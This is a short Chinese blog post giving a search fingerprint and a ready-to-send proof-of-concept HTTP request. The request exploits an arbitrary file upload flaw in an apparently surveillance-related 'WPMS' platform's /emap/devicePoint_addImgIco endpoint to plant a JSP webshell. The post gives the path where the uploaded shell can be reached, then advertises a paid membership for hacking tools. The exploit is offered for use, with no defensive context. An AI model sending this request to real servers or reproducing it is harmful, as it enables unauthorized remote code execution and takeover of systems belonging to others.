fofa指纹:WPMS/asset/lib/gridster/
漏洞POC:
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Length: 228
Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982
--f3aeb22be281d77542546a2f71e20982
Content-Disposition: form-data; name="upload"; filename="yb.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
(马子)
--f3aeb22be281d77542546a2f71e20982--
验证过程:
马子链接:
http://xx.xx.xx.xx/upload/emap/society_new/ico_res_85c7dc2aec23_on.jsp
公众号中之前提及的所有工具,均放在APP“知识星球”,星球会员100元加入,内含大量工具,包含公众号之前发过的工具,均可免费下载。另可享受本人在线教学福利。
小知识
声明
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...